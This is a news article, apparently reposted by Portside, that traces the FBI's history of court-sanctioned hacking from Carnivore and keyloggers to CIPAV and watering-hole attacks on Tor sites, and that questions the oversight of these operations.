Portside aims to provide varied material of interest to people on the left that will help them to interpret the world, and to change it.
Recent headlines warn that the government now has greater authority to hack your computers, in and outside the US. Changes to federal criminal court procedures known as Rule 41 are to blame; they vastly expand how and whom the FBI can legally hack. But just like the NSA’s hacking operations, FBI hacking isn’t new. In fact, the bureau has a long history of surreptitiously hacking us, going back two decades.
That history is almost impossible to document, however, because the hacking happens mostly in secret. Search warrants granting permission to hack get issued using vague, obtuse language that hides what’s really happening, and defense attorneys rarely challenge the hacking tools and techniques in court. There’s also no public accounting of how often the government hacks people. Although federal and state judges have to submit a report to Congress tracking the number and nature of wiretap requests they process each year, no similar requirement exists for hacking tools. As a result, little is known about the invasive tools the bureau, and other law enforcement agencies, use or how they use them. But occasionally, tidbits of information do leak out in court cases and news stories.
A look at a few of these cases offers a glimpse at how FBI computer intrusion techniques have developed over the years. Note that the government takes issue with the word “hacking,” since this implies unauthorized access, and the government’s hacking is court-sanctioned. Instead it prefers the terms “remote access searches” and Network Investigative Techniques, or NIT. By whatever name, however, the activity is growing.
The FBI’s first known computer surveillance tool was a traffic sniffer named Carnivore that got installed on network backbones—with the permission of internet service providers. The unfortunately named tool was custom-built to filter and copy metadata and/or the content of communications to and from a surveillance target. The government had already used it about 25 times, beginning in 1998, when the public finally learned about it in 2000 after Earthlink refused to let the FBI install the tool on its network. Earthlink feared the sniffer would give the feds unfettered access to all customer communications. A court battle and congressional hearing ensued, which sparked a fierce and divisive debate, making Carnivore the Apple/FBI case of its day.
The FBI insisted to Congress that its precision filters prevented anything but the target’s communications from being collected. But Carnivore’s descriptive name seemed to defy that, and an independent review ultimately found that the system was “capable of broad sweeps” if incorrectly configured. The reviewers also found that Carnivore lacked both the protections to prevent someone from configuring it this way and the capability to track who did it if the configuration got changed.
By 2005, the FBI had replaced Carnivore with commercial filters, but was still using other custom-built collection tools in the Carnivore family. But all of these network surveillance tools had one problem, the same issue plaguing law enforcement agencies today: encryption. FBI agents could use tools to siphon all the data they wanted as it crossed various networks, but if the data was encrypted, they couldn’t read it.
Enter key loggers designed to circumvent encryption by capturing keystrokes as a surveillance target typed, before encryption kicked in.
Cosa Nostra mob boss Nicodemo Salvatore Scarfo, Jr., was the first criminal suspect known to be targeted by a government keystroke logger in 1999. Scarfo was using encryption to protect his communications, and the FBI used a key logger—which was likely a commercially made tool—to capture his PGP encryption key. Unlike key loggers today which can be remotely installed, however, the FBI had to physically break into Scarfo’s office twice to install the logger on his computer and retrieve it, since Scarfo was using a dial-up internet connection that prevented authorities from reaching his computer remotely.
The FBI apparently went rogue in using the tool, however, because a government memo from 2002 (.pdf) recently obtained by MIT national security researcher Ryan Shapiro revealed that the Justice Department was irked that the Bureau had “risked a classified technique on an unworth [sic] target.”
Scarfo challenged the surveillance, arguing in a motion that the feds needed a wiretap order to capture the content of his communications and that a search warrant was insufficient. His lawyers sought information about the keylogger, but the government insisted the technology—which was already being used in the wild by hackers—was classified for national security reasons. It’s one of the same excuses the government uses today to keep a veil over its surveillance tools and techniques.
The Scarfo case evidently convinced the feds that they needed to develop their own custom hacking tools, and in 2001, reporters got wind of Magic Lantern, the code name for an FBI keylogger that apparently went beyond what the government had used against Scarfo, since this one could be installed remotely. (A former lawyer for Scarfo who has asked to remain anonymous says Magic Lantern was not the tool used on the mob boss, though he doesn’t know the name of the tool that was.)
In addition to keystrokes, this new tool also recorded web browsing history, usernames and passwords and listed all the internet-facing ports open on a machine. It may have been used for the first time in Operation Trail Mix, an investigation of an animal rights group that occurred in 2002 and 2003. As recently revealed by the New York Times, the FBI used a tool to get around the encryption one suspect in the case was using; although the tool was never identified in court documents, it’s believed to have been a keystroke logger. “This was the first time that the Department of Justice had ever approved such an intercept of this type,” an FBI agent wrote about the tool in a 2005 email obtained by Shapiro this year.
After the news about Magic Lantern leaked in 2001, the government managed to keep a tight lid on its hacking tools and techniques for nearly a decade.
In 2009, the public finally got a more comprehensive view of FBI hacking when WIRED obtained a cache of government documents through a FOIA request. The documents described a surveillance tool called CIPAV—Computer and Internet Protocol Address Verifier—designed to collect a computer’s IP and MAC address, an inventory of all open ports and software installed on the machine, as well as registry information, the username of anyone logged in and the last URL visited by the machine. All of this data got sent to the FBI over the internet. CIPAV apparently didn’t come with a keystroke logger, however, and didn’t collect the contents of communication. Many in the security community believe that CIPAV, which has been around for at least as long as Magic Lantern and is still used today, is Magic Lantern by another name, minus the keystroke logger component.
The tool helped identify an extortionist in 2004 who was cutting phone and internet cables and demanding money from telecoms to stop. In 2007 it was used to unmask a teen who was e-mailing bomb threats to a high school in Washington state. And it’s been used in various other cases, ranging from hacker investigations to terrorism and foreign spying cases, all for the primary purpose of unmasking the IP address of targets who used anonymizing services to hide their identity and location.
It was apparently so popular that a federal prosecutor complained (.pdf) in 2002 that it was being used too much. “While the technique is of indisputable value in certain kinds of cases,” he wrote, “we are seeing indications that it is being used needlessly by some agencies, unnecessarily raising difficult legal questions (and a risk of suppression) without any countervailing benefit.” In other words, the more it got used, the more likely defense attorneys would learn about it and file legal objections to throw out evidence collected with it.
But hacking surveillance targets one at a time is too time-consuming when a crime involves many suspects. So in 2012 the government borrowed a favorite trick of the criminal hacker trade: drive-by downloads, also known as watering hole attacks. These involve embedding spyware on a website where criminal suspects congregate so the computers of all visitors to the site get infected. It has become a favorite government tactic for unmasking visitors to child porn sites hosted with Tor Hidden Services, which can only be accessed using the Tor anonymizing browser, which conceals the real IP address of users. To infect suspect machines, the feds first gain control of servers hosting the sites, then embed their spyware in one of the site’s pages.
They apparently used a watering hole attack for the first time in Operation Torpedo, a sting operation aimed at unmasking anonymous visitors to three child porn sites hosted on servers in Nebraska in 2012.
The FBI and international partners used a similar tactic last year to target more than 4,000 machines belonging to members and would-be members of the child porn site Playpen. The FBI, for its part, identified the real IP addresses of some 1,300 Playpen visitors, of which about 137 have been charged with crimes.
For all that we now know about government hacking, there’s so much more that we still don’t know. For example, what exactly is the government doing with these tools? Are they just grabbing IP addresses and information from a computer’s registry? Or are they doing more invasive things—like activating the webcam to take pictures of anyone using a targeted machine, as they sought to do in a 2013 case? How are the tools tested to make sure they don’t damage the machines they infect? The latter is particularly important if the government installs any tool on the machines of botnet victims, as the recent Rule 41 changes suggest they might do.
Do investigators always obtain a search warrant to use the tools? If yes, do the spy tools remain on systems after the term of the search warrant ends or do the tools self-delete on a specified date? Or do the tools require law enforcement to send a kill command to disable and erase them? How often does the government use zero-day vulnerabilities and exploits to covertly slip their spyware onto systems? And how long do they withhold information about those vulnerabilities from software vendors so they can be exploited instead of patched?
The Justice Department has long insisted that its hacking operations are legal, done with search warrants and court supervision. But even operations done with court approval can raise serious questions. The case in 2007 of the teen who sent bomb threats is one example. In order to infect the teenage suspect’s computer, the FBI tricked him into downloading the spy tool by posting a malicious link (.pdf) to the private chat room of a MySpace account the teen controlled. The link was for a bogus Associated Press article purporting to be about the bomb threats.
The FBI didn’t disclose in its warrant affidavit that it planned to lure the suspect with a news article; that only came to light in FBI emails later obtained by the Electronic Frontier Foundation. The AP accused the feds of undermining its credibility and putting AP journalists and other newsgatherers around the world in danger by giving the appearance that the media outlet had worked in collusion with the government. There’s one other problem with the tactic as well—the potential spread of the malware. “The FBI may have intended this false story as a trap for only one person,” the AP added, in a letter to the Justice Department. “However, the individual could easily have reposted this story to social networks, distributing to thousands of people, under our name, what was essentially a piece of government disinformation.”
And then there’s the recent PlayPen sting, where for the two weeks the operation continued, the government allowed people visiting the site to download and share thousands of exploitive images and videos of toddlers and pre-teens, further victimizing the children and infants in those images.
“The public might want to know, how did the FBI figure out where on balance it’s worth it to run a child porn web site for two weeks, given some of what’s involved in the covert operations will essentially permit more child porn to be distributed. Someone has to make [those] calculations,” says Elizabeth Joh, a University of California Davis law professor who writes extensively about policing, technology and surveillance. “But we don’t know how that calculation is made.”
It’s not clear if Congress knows either.
Questions about how much law enforcement can participate in criminal behavior and disguise their identity in covert operations are not new in the offline world. “But there’s more urgency now because of the ways in which [online investigations] are becoming more complex, and we continue to have very little oversight,” she says. “What sort of oversight should there be when the FBI decides to impersonate real people, real institutions—particularly the media—and when it actually participates in the very illegal activity that it’s trying to stop? Should we really leave law enforcement to police themselves? That’s the question.”